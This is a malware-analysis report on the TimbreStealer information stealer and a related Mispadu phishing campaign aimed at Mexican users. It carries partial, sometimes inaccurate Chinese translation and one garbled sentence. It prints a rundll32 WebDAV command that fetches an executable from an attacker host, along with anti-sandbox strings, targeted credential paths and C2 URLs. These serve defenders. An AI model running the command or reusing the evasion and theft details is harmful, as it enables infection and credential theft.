• Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.”
  思科 Talos 发现了一个由威胁行为者发起的新活动，该活动传播了一种我们称之为“TimbreStealer”的先前未知的恶意软件。
• This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
  据观察，该威胁行为者至少从 2023 年 11 月开始，通过使用墨西哥税务相关主题的垃圾邮件活动来分发 TimbreStealer。该威胁行为者之前曾使用类似的策略、技术和程序 (TTP) 来分发名为“Mispadu”的银行木马。
• TimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.
  TimbreStealer 是一种新的模糊信息窃取程序，针对墨西哥的受害者。
• It contains several embedded modules used for orchestration, decryption and protection of the malware binary.
  它包含多个嵌入式模块，用于编排、解密和保护恶意软件二进制文件。

Talos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023. This campaign uses phishing emails with financial themes, directing users to a compromised website where the payload is hosted and tricking them into executing the malicious application.
Talos 观察到针对墨西哥潜在受害者的持续网络钓鱼垃圾邮件活动，引诱用户下载一种新的模糊信息窃取程序（我们称之为 TimbreStealer），该软件至少自 2023 年 11 月以来一直活跃。该活动使用带有金融主题的网络钓鱼电子邮件，引导用户到托管有效负载的受感染网站并诱骗他们执行恶意应用程序。

Talos has observed new distribution campaigns being conducted by this threat actor since at least September 2023, when they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers before changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we haven’t found any evidence of Mispadu being used anymore.
Talos 观察到该威胁行为者至少自 2023 年 9 月起就开始进行新的分发活动，当时他们最初使用地理围栏 WebDAV 服务器分发 Mispadu 银行木马的变体，然后将有效负载更改为这个新的信息窃取程序。在威胁行为者更换为新的窃取者后，我们尚未发现任何 Mispadu 被使用的证据。

The phishing campaign uses geofencing techniques to only target users in Mexico, and any attempt to contact the payload sites from other locations will return a blank PDF file instead of the malicious file. The current spam run was observed to mainly use Mexico’s digital tax receipt standard called CDFI (which stands for “Comprobante Fiscal Digital por Internet,” or online fiscal digital invoice in English). Talos has also observed emails using generic invoice themes used for the same campaign. 
网络钓鱼活动使用地理围栏技术仅针对墨西哥的用户，任何从其他位置联系有效负载站点的尝试都将返回空白 PDF 文件，而不是恶意文件。据观察，当前的垃圾邮件主要使用墨西哥的数字税单标准 CDFI（代表“Comprobante Fiscal Digital por Internet”，即英文在线财政数字发票）。 Talos 还观察到在同一活动中使用通用发票主题的电子邮件。

Although we could not find hard evidence linking the two campaigns, we assess with high confidence they are operated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity distributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more evidence of Mispadu being used. 
尽管我们无法找到将这两个活动联系起来的确凿证据，但根据在该活动中观察到的相同 TTP 以及之前分发 Mispadu 的活动，以及一旦 TimbreStealer 开始被攻击的事实，我们非常有信心地评估它们是由同一威胁参与者操作的。分发后，我们找不到更多使用 Mispadu 的证据。

TimbreStealer, a new obfuscated information stealer
TimbreStealer，一种新的模糊信息窃取程序

Talos has identified a new family of information stealers while investigating a spam campaign targeting Mexican users starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam campaign which we will analyze later.
Talos 在调查 2023 年 11 月开始的针对墨西哥用户的垃圾邮件活动时发现了一个新的信息窃取者家族。TimbreStealer 这个名称引用了垃圾邮件活动中使用的主题之一，我们将在稍后进行分析。

TimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution, and ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass conventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit process, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the authors are skilled and have developed these components in-house.
TimbreStealer 展示了一系列复杂的技术来规避检测、进行秘密执行并确保其在受感染系统中的持久性。这包括利用直接系统调用绕过传统 API 监控、利用 Heaven’s Gate 技术在 32 位进程中执行 64 位代码以及利用自定义加载程序。这些功能表明了高水平的复杂性，表明作者技术精湛并且已经在内部开发了这些组件。

The sample we’re analyzing was found on a victim machine following a visit to a compromised website after the users clicked on a link present in a spam email. 
我们正在分析的样本是在用户单击垃圾邮件中存在的链接后访问受感染网站后在受害者计算机上发现的。

Our analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption process involving a main orchestration DLL and a global decryption key which is used throughout the different modules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the initial modules and their relationship.
我们的分析确定了恶意软件“.data”部分中嵌入的多个模块，以及涉及主编排 DLL 和全局解密密钥的复杂解密过程，该全局解密密钥在不同模块中使用并在每个阶段更新。虽然此分析尚未完成，但我们希望至少描述初始模块及其关系。

TimbreStealer’s Decryption Process 
TimbreStealer 的解密过程

This first layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first scan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this point will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from 32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued. 
第一层可执行文件已打包，并在其“.data”部分中包含一个嵌入式 DLL。加载程序将首先扫描 Ntdll 中的所有 Zw* 导出并构建函数的有序哈希表。从此时起，所有敏感 API 都将通过直接系统调用进入内核来调用。对于 64 位机器，这将包括在发出系统调用之前通过 Heaven’s Gate 从 32 位模式转换到 64 位模式。

Once this is complete, it will then decrypt the next stage payload from the .data section. The decrypted DLL has its MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader now launches the DLL passing the Zw* hash table as an argument to its exported function. 
一旦完成，它将从 .data 部分解密下一阶段的有效负载。解密的 DLL 的 MZ 标头和 PE 签名被擦除，我们将在该恶意软件中看到这种技术。自定义 PE 加载程序现在启动 DLL，并将 Zw* 哈希表作为参数传递给其导出​​函数。

Decryption of all submodules makes use of a global decryption key. As the execution of the malware progresses, this key is encrypted over and over again. If execution does not follow every step of the expected path, the decryption key will get out of sync and all subsequent decryptions will fail. 
所有子模块的解密都使用全局解密密钥。随着恶意软件执行的进行，该密钥会被一遍又一遍地加密。如果执行不遵循预期路径的每一步，解密密钥将不同步，并且所有后续解密都将失败。

This prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments to access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption rounds on the global key are scattered about in the code and even occur from within the different sub-modules themselves.

All stages of this malware use the same coding style and techniques. We therefore assess with high confidence that all obfuscation layers and final payload were developed by the same authors.

TimbreStealer’s embedded modules

Once the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s being executed in a sandbox environment. It will also extract the many submodules embedded in the payload. Talos identified at least three different layers after the main payload was extracted, with several modules in each layer used for different functions:

The second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest and extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first checks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin American region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to ensure it is not running in a sandbox environment.

At this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of previous infection, and scan the system browsers for signs of natural use. The files and registry keys checked by the malware include the non-exhaustive list below:

• HKLM\SOFTWARE\Microsoft\CTF\TIP\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}
  • {A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = <value>
  • {E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = <value>
  • {DB2D2D69-9EE0-9A3C-2924-67021A31F870} = <value>
  • {6EF3E193-61BF-4F68-9736-51CF6905709D} = <value>
  • {3F80FA11-1693-4D05-AA83-D072E69B77FC} = <value>
  • {419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = <value>
• C:\Windows\Installer\{E1284A06-8DFA-48D4-A747-28ECD07A2966}
• Global\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U

The presence of these keys along with other checks mentioned before will prevent the execution of the remaining stages of the malware.

The orchestrator contains four other encrypted sub-modules within it.

IDX	Size	CRC32	Purpose
0	8kb	0xF25BEB22	Shellcode loader for stripped DLLs
1	100kb	0xEB4CD3EC	DLL – not analyzed yet
2	60kb	0xFA4AA96B	DLL – Anti-vm and anti-analysis, system of interest checks
3	3.92mb	0xAB029A74	DLL – Installer with encrypted payload

All blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of data and can optionally decompress the raw data if specified. This overall architecture has been observed in all layers.

Each stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred to this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.

Submodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on the global decrypt buffer. If any check fails, the installer module will not decrypt properly. Checks in this layer include:
2 号子模块是一个反分析 DLL，它执行多次检查并对全局解密缓冲区进行分散的多轮加密。如果任何检查失败，安装程序模块将无法正确解密。该层的检查包括：

• VMWare hook and port checks.
  VMWare 挂钩和端口检查。
• Vpcext, IceBP, int 2D instructions to detect debuggers.
  Vpcext、IceBP、int 2D 指令用于检测调试器。
• Checking physical drive for strings: qemu, virtual, vmware, vbox, xensrc, sandbox, geswall, bufferzone, safespace, virtio, harddisk_ata_device, disk_scsi_disk_device, disk_0_scsi_disk_device, nvme_card_pd, google_persistentdisk.
  检查物理驱动器中的字符串：qemu、virtual、vmware、vbox、xensrc、sandbox、geswall、bufferzone、safespace、virtio、harddisk_ata_device、disk_scsi_disk_device、disk_0_scsi_disk_device、nvme_card_pd、google_persistentdisk。

If all of these checks complete as expected, then the final module can be decrypted successfully. 
如果所有这些检查都按预期完成，那么最终的模块就可以成功解密。

Submodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy document will also be displayed to help defer suspicion. 
第 3 号子模块是安装程序层，它将向磁盘释放几个文件并触发执行。还将显示一份良性诱饵文件以帮助推迟怀疑。

Execution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses Microsoft’s reg.exe to add a run once registry key, and then trigger rundll32.exe to process this entry through the system iernonce.dll.

Under certain conditions, this layer can also modify Group Policy options to set startup scripts.

TimbreStealer’s Installed DLL modules

The installed DLL named Cecujujajofubo475.dll uses the same overall architecture as the first DLL detailed above, with all of its internal strings encrypted, uses a global decrypt buffer, and uses a different Zw* API hash table to perform direct syscalls avoiding user API.

In this layer there are also TLS callbacks to add complexity to global decrypt buffer encryption. An extra round of encryption has also been added that depends on the parent process name and value within the registry key given above to prevent analysis on 3rd party machines.

This DLL contains eight encrypted sub-modules within it:

IDX	Size	CRC32	Purpose
0	0x1000	0x2B80E901	Single XOR function accepting 5 arguments
1	0x1000	0x520200E8	x64 shellcode PE loader
2	0x2000	0x105542F7	x86 shellcode PE loader
3	0x2000	0xC4ECE0A8	Unknown shellcode
4	0x7600	0xC1384E15	Unknown module, seems to be used to decompress other blobs
5	0xD800*	0x1D38B250	Anti-VM/Sandbox layer
6	0x1B600*	0x4F1FEFE3	x86 DLL to extract main payload 用于提取主要有效负载的 x86 DLL
7	0x1EE00*	0xF527AC18	x64 DLL to extract main payload 用于提取主要有效负载的 x64 DLL

(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
(*) 表示 blob 在解密后被解压缩。该列显示解压后的大小。

While this DLL contains many of the same protections found in the installation phase, several more have been identified in this layer. The first is a patch to the ZwTraceEvent API to disable user mode Event Tracing for Windows data collection. 
虽然此 DLL 包含许多与安装阶段相同的保护措施，但在这一层中还发现了更多保护措施。第一个是 ZwTraceEvent API 的补丁，用于禁用 Windows 数据收集的用户模式事件跟踪。

Another interesting protection overwrites all of the loaded DLLstwo-stagein the process with clean copies from the that disk. This will wipe all Antivirus vendor user mode hooks, software breakpoints, and user patches during execution. 
另一个有趣的保护是使用该磁盘上的干净副本覆盖进程中所有加载的 DLL。这将在执行期间擦除所有防病毒供应商用户模式挂钩、软件断点和用户补丁。

This DLL serves as a loader for the final payload which is housed within the ApplicationIcon.ico file shown in the previous relationship diagram. Submodule No. 7 will be the default loader that Submodule attempts to launch. They attempt to inject this 64-bit DLL into a preferred list of svchost.exe processes. 
该 DLL 用作最终有效负载的加载程序，该有效负载位于前面的关系图中所示的 ApplicationIcon.ico 文件中。 7 号子模块将是子模块尝试启动的默认加载程序。他们尝试将此 64 位 DLL 注入到 svchost.exe 进程的首选列表中。

The order of preference is based on svchost.exe process command line, looking for the following strings: 
优先顺序基于 svchost.exe 进程命令行，查找以下字符串：

• DcomLaunch  Dcom发射
• Power   力量
• BrokerInfrastructure   经纪商基础设施
• LSM
• Schedule   日程

If the injections into svchost.exe fail, then a backup 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. A new thread is created using syscalls with a modified context, and then ResumeThread triggers its execution. All memory allocations for the shellcode are also executed through the syscall mechanism set up earlier. 
如果注入 svchost.exe 失败，则还可以使用备份的 32 位回退 shellcode。在此模式下，从子模块 6 加载两阶段 shellcode，并将执行转移到该子模块。使用系统调用和修改后的上下文创建一个新线程，然后 ResumeThread 触发其执行。 shellcode 的所有内存分配也是通过之前设置的系统调用机制执行的。

The first stage of the shellcode will decrypt its second stage, and then extract and decrypt the final payload DLL from the ApplicationIcon.ico file. The 32 bit version will again use a custom PE loader to directly load and run the final payload DLL within its own process after extraction.
shellcode 的第一阶段将解密其第二阶段，然后从 ApplicationIcon.ico 文件中提取并解密最终的有效负载 DLL。 32 位版本将再次使用自定义 PE 加载器在提取后在其自己的进程中直接加载并运行最终的有效负载 DLL。

TimbreStealer’s Final Payload Module

The architecture of this layer is the same as all of the previous and contains an additional nine sub-modules. Analysis of this final payload module and submodules is still ongoing at the time of writing:

IDX	SIZE	CRC32	PURPOSE
0	0X1000	0X2B80E901	SINGLE XOR FUNCTION ACCEPTING 5 ARGUMENTS. MATCHES THE PREVIOUS LAYER BLOB #0
1	0X1000	0X520200E8	X64 SHELLCODE PE LOADER. MATCHES THE PREVIOUS LAYER BLOB #1
2	0X2000	0X105542F7	X86 SHELLCODE PE LOADER. MATCHES THE PREVIOUS LAYER BLOB #2
3	0X2000	0XC4ECE0A8	UNKNOWN SHELLCODE. MATCHES THE PREVIOUS LAYER BLOB #3
4	0XA5000*	0XB0214A74	NOT YET ANALYZED
5	0x13CC00*	0xE8421ADE	Not yet analyzed
6	0x16800*	0xD30A298E	Not yet analyzed
14	0x16600*	0x55BFB99	Not yet analyzed
15	0x7C800*	0x2F6F928D	Not yet analyzed

(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.

The following is a preliminary analysis of the malware features based on the strings we were able to decrypt from this module. They indicate the malware can collect a variety of information from the machine and post data to an external website, which is typical behavior of an information stealer.

Collect credential information from the victim’s machine

The following strings were found in functions scanning files and directories. This module also embeds the SQLite library to handle different browsers’ credential storage files.

• CloudManagementEnrollmentToken
• Google\\Chrome Beta\\User Data
• Google\\Chrome Dev\\User Data
• Google\\Chrome SxS\\User Data
• Google\\Chrome\\User Data
• Google\\Policies
• Microsoft\\Edge Beta\\User Data
• Microsoft\\Edge Dev\\User Data
• Microsoft\\Edge\\User Data
• Software\\Google\\Chrome
• Software\\Google\\Chrome\\Enrollment
• Software\\Google\\Enrollment
• Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}
• SOFTWARE\\Microsoft\\Cryptography
• Software\\Policies\\Google\\Chrome
• Software\\Policies\\Google\\Update
• history
• feeds
• feeds cache
• internet explorer
• media player
• office
• OneDrive
• packages 包
• Skydrive 网盘
• Formhistory.sqlite 表单历史记录.sqlite
• SELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;
  从 `moz_historyvisits` 中选择 count(`place_id`)，其中 `place_id` = %I64u；
• SELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`
  从“moz_places”中选择“id”、“url”、“visit_count”，其中“last_visit_date”
• Mozilla\\Firefox\\Profiles\\
  Mozilla\\Firefox\\配置文件\\
• Thunderbird\\Profiles\\ 雷鸟\\配置文件\\
• Postbox\\Profiles\\ 邮箱\\个人资料\\
• PostboxApp\\Profiles\\ PostboxApp\\配置文件\\
• SOFTWARE\\Mozilla\\Mozilla Firefox
  软件\\Mozilla\\Mozilla Firefox
• SOFTWARE\\Mozilla\\Mozilla Thunderbird
  软件\\Mozilla\\Mozilla Thunderbird
• SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList

Search for Files 搜索文件

The malware also scans several directories looking for files although it’s not clear yet for what purpose. We can see in the list below folders related to AdwCleaner, Avast Scanner as well as 360 Antivirus quarantine folders. 
该恶意软件还会扫描多个目录以查找文件，但目前尚不清楚其目的。我们可以在下面的列表中看到与AdwCleaner、Avast Scanner以及360杀毒隔离文件夹相关的文件夹。

Another set of interesting strings in this list are “.Spotlight-V100” and “.fseventsd” which are related to MacOS.
此列表中另一组有趣的字符串是与 MacOS 相关的“.Spotlight-V100”和“.fseventsd”。

• $360Section $360款
• $AV_ASW
• $GetCurrent $获取当前
• $Recycle.Bin $回收站
• $SysReset
• $WinREAgent
• .fseventsd
• .Spotlight-V100
• AdwCleaner
• AMD
• Autodesk
• boot
• Brother
• Config.Msi
• Documents and Settings
• EFI
• Hewlett-Packard
• inetpub
• Intel
• MSOCache
• PerfLogs
• Program Files
• Program Files (x86)
• ProgramData
• Recovery
• RecoveryImage
• Resources
• SWSetup
• System Volume Information
• SYSTEM.SAV
• ~MSSETUP.T
• $WINDOWS.
• AutoKMS
• KMSAuto
• Users
• AppData\\Local
• AppData\\Roaming
• Desktop
• Documents
• Downloads
• OneDrive
• Dropbox

Collect OS information

TimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a wealth of information about the machine where it’s running.

• OS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate, InstallTime
• SMB BIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion, SerialNumber, Vendor, Version
• Hardware information: Win32_ComputerSystemProduct, Win32_BaseBoard, Win32_Bios, Win32_PhysicalMemory
• Network Domain Information: StandaloneWorkstation, MemberWorkstation, StandaloneServer, MemberServer, BackupDomainController, PrimaryDomainController
• Application information: DisplayName, Publisher, DisplayVersion, OSArchitecture

Search for file extensions
搜索文件扩展名

The code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not associated with any known file type. This may be indicative of a file that is created by the malware itself.
该代码还会查找特定的文件扩展名列表。请注意，下面的扩展名“.zuhpgmcf”不与任何已知的文件类型关联。这可能表明该文件是由恶意软件本身创建的。

• .bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf
  .bak、.fbk、.dat、.db、.cmp、.dbf、.fdb、.mdf、.txt、.cer、.ods、.xls、.xlsx、.xml、.zuhpgmcf

Look for URLs Accessed 查找访问的 URL

The strings below represent URLs of interest to the malware. It also contains mentions of a virtual device used to capture network packets, which may be indicative that the malware can do network sniffing.
下面的字符串代表恶意软件感兴趣的 URL。它还提到了用于捕获网络数据包的虚拟设备，这可能表明恶意软件可以进行网络嗅探。

• npf
• npcap
• npcap_wifi
• www.google.com
• amazon.com 亚马逊网站
• dropbox.com
• linkedin.com
• twitter.com 推特.com
• wikipedia.org 维基百科.org
• facebook.com 脸书网
• login.live.com 登录live.com
• apple.com 苹果网站
• www.paypal.com

Disable System Protections

The malware executes calls to a function used to remove System Restore points on the machine. This is a typical behavior of Ransomware malware although Talos have not observed any Ransomware activity on infected victims. Additional analysis is still needed in order to confirm or discard this hypothesis.

• SELECT * FROM SystemRestore
• SequenceNumber
• SrClient.dll
• SRRemoveRestorePoint
• SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Power
• HiberbootEnabled

Look for Remote Desktop Software

The malware attempts to access services and Mutex used by Remote Desktop servers. It’s not clear yet how this is used in the payload code.

• console
• TermService
• Global\\TermSrvReadyEvent
• winlogon.exe
• console

POST data to remote site

A list of URLs along with strings used in HTTP communication was found in functions accessing the network. These URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe these to be the command and control servers used by the malware, but so far, the samples we analyzed have not communicated back to any of them.

• POST
• PUT
• Content-Disposition: form-data; name=”
• “; filename=”
• “\\r\\nContent-Type: application/octet-stream\\r\\n
• Content-Type: multipart/form-data; boundary=
• Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
• Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
• HTTP/1.1 200 OK\\r\\nDate: %s %s GMT\\r\\nConnection: Close\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\r\\nContent-Type: text/plain;charset=UTF-8\\r\\n\\r\\n
• https://hamster69[.]senac2021[.]org/~armadillo492370/https://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/https://69[.]64[.]35[.]1/~route649289/

These strings are just a small piece of this puzzle, and more analysis is required on the final payload and its embedded modules to understand their exact purpose.

Previous Mispadu spam campaign

Activity associated with these current distribution campaigns was first observed in September 2023 when the threat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised websites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an externally hosted file upon the victim double clicking on it.

Both URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via WebDAV. This connection is performed by Rundll32.exe with the parameters shown in the example below:
这两个 URL 都是远程 UNC 路径，并使用端口规范“@80”强制通过 WebDAV 进行连接。此连接由 Rundll32.exe 执行，参数如下例所示：

• rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe 
  rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/ 9577710738/1242144429.exe

During the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in Mexico.
在活动期间，所有 WebDAV 服务器都经过地理围栏，仅允许来自墨西哥 IP 地址的连接。

The .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro Federal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file names also typically contained 6 random digits. 
.url 文件的命名方式多种多样，但几乎总是包含“RFC”，这是对 Registro Federal de Contribuyentes（联邦纳税人登记处）的引用，表明该诱惑与财务有关。 .url 文件名通常还包含 6 个随机数字。

The Mispadu payload contained a hardcoded C2 address which used HTTPS as communication protocol. We have seen a variety of C2 URLs, changing up over time but keeping a similar pattern pointing to “it.php” with two parameters “f” and “w”: 
Mispadu 有效负载包含一个硬编码的 C2 地址，该地址使用 HTTPS 作为通信协议。我们已经看到了各种 C2 URL，随着时间的推移而变化，但保持类似的模式指向“it.php”，并带有两个参数“f”和“w”：

• hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
• hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
• hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
• hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
• hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010

We observed this campaign to be active until the middle of November, at which time a new payload with TimbreStealer was dropped on the victim’s computers from the compromised website.
我们观察到该活动一直活跃到 11 月中旬，此时带有 TimbreStealer 的新有效负载从受感染的网站投放到受害者的计算机上。

The target industries of this campaign is spread around different verticals with a slight focus on manufacturing and transportation as we can see below:
此次活动的目标行业分布在不同的垂直领域，重点关注制造业和运输业，如下所示：

Spam campaign using CDFI as lure

Talos detected a low-volume campaign using CDFI to lure users to download and execute a malicious file disguised as a PDF document starting around the middle of November and still ongoing as of February 2024. CDFI is a mandatory electronic invoice standard used in Mexico for purposes of Tax reporting. In this campaign, a spam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.

The Subjects we observed in this campaign follow the same theme:

• Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
• Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288

The website uses Javascript to detect characteristics of the user such as geolocation and browser type and then initiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer dropper using WebDAV. The Zip file is usually named following the same theme:

• CFDI_930209.zip
• FACTURA_560208.zip

In case the access does not come from Mexico, a blank PDF is served instead of the malicious payload.

All the URLs for this current campaign follow a similar format:
当前活动的所有 URL 都遵循类似的格式：

• hxxps://<some>.<compromised>[.]<web>/<token>/<14_char_hex_id>

Where <token> above is one of the following strings: “cfdi”, “factura”, “timbreDigital”,  “facdigital” or “seg_factura”. The first part of the domain is also a random Spanish word related to digital invoices followed by two numbers.
其中上面的 <token> 是以下字符串之一：“cfdi”、“factura”、“timbreDigital”、“facdigital”或“seg_factura”。域名的第一部分也是一个与数字发票相关的随机西班牙语单词，后跟两个数字。

• hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
• hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
• hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
• hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9

The .url file this time contains more obfuscation intended to make detection by Antivirus products more difficult, yet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:
这次的 .url 文件包含更多混淆，旨在使防病毒产品的检测更加困难，但它仍然通过 HTTP 使用 WebDAV 下载恶意文件和代表 PDF 文件的图标：

User interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to execute, at which point the TimbreStealer main infection will start.

ATT&CK TTPs Used in TimbreStealer Campaign

ATT&CK ID	Description
T1566.002	Spearphishing Link
T1566.001	Spearphishing Attachment
T1204.002	Malicious File
T1105	Ingress Tool Transfer
T1190	Exploit Public-Facing Application
T1071.001	Web Protocols
T1036.005	Masquerading: Match Legitimate Name or Location
T1483	Domain Generation Algorithms
T1071	Application Layer Protocol
T1027.009	Obfuscated Files or Information: Embedded Payloads
T1027.010	Obfuscated Files or Information: Command Obfuscation
T1027.002	Obfuscated Files or Information: Software Packing
T1564.001	Hide Artifacts: Hidden Files and Directories
T1497.003	Virtualization/Sandbox Evasion: Time Based Evasion
T1497.001	Virtualization/Sandbox Evasion: System Checks
T1497.002	Virtualization/Sandbox Evasion: User Activity Based Checks
T1055.002	Process Injection: Portable Executable Injection
T1055.001	Process Injection: Dynamic-link Library Injection
T1055.012	Process Injection: Process Hollowing
T1140	Deobfuscate/Decode Files or Information
T1574.002	Hijack Execution Flow: DLL Side-Loading
T1082	System Information Discovery
T1486	Data Encrypted for Impact
T1070.001	Indicator Removal: Clear Windows Event Logs
T1012	Query Registry
T1140	Deobfuscate/Decode Files or Information
T1204	User Execution: Malicious File
T1053.003	Scheduled Task/Job: Cron
T1053.005	Scheduled Task/Job: Scheduled Task
T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1112	Modify Registry

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
思科安全防火墙（以前称为下一代防火墙和 Firepower NGFW）设备，例如威胁防御虚拟、自适应安全设备和 Meraki MX，可以检测与此威胁相关的恶意活动。

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
思科安全恶意软件分析 (Threat Grid) 可识别恶意二进制文件并在所有思科安全产品中构建保护。

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Umbrella 是思科的安全互联网网关 (SIG)，可以阻止用户连接到恶意域、IP 和 URL，无论用户是否位于公司网络内。在此注册免费试用 Umbrella。

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
思科安全网络设备（以前称为网络安全设备）会自动阻止潜在危险站点并在用户访问可疑站点之前对其进行测试。

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
防火墙管理中心提供针对您的特定环境和威胁数据的附加保护。

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Cisco Duo 为用户提供多重身份验证，以确保只有经过授权的用户才能访问您的网络。

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
开源 Snort 订阅者规则集客户可以通过下载可在 Snort.org 上购买的最新规则包来了解最新情况。

The following Snort SIDs are applicable to this threat: 63057 – 63072 and 300840 – 300844.
以下 Snort SID 适用于此威胁：63057 – 63072 和 300840 – 300844。

The following ClamAV signatures have been released to detect malware artifacts related to this threat:
已发布以下 ClamAV 签名来检测与此威胁相关的恶意软件工件：

• Win.Infostealer.TimbreStealer-10021027-0
• Win.Infostealer.TimbreStealer-10021026-0
• Win.Infostealer.Generic-10017202-0
• Win.Packed.Generic-10019162-0
• Win.Dropper.Generic-10017203-0

Indicators of Compromise 妥协指标

IOCs for this research can be found in our GitHub repository here.
这项研究的 IOC 可以在我们的 GitHub 存储库中找到。

Potential C2 URLs

hxxps://hamster69[.]senac2021[.]org/~armadillo492370/
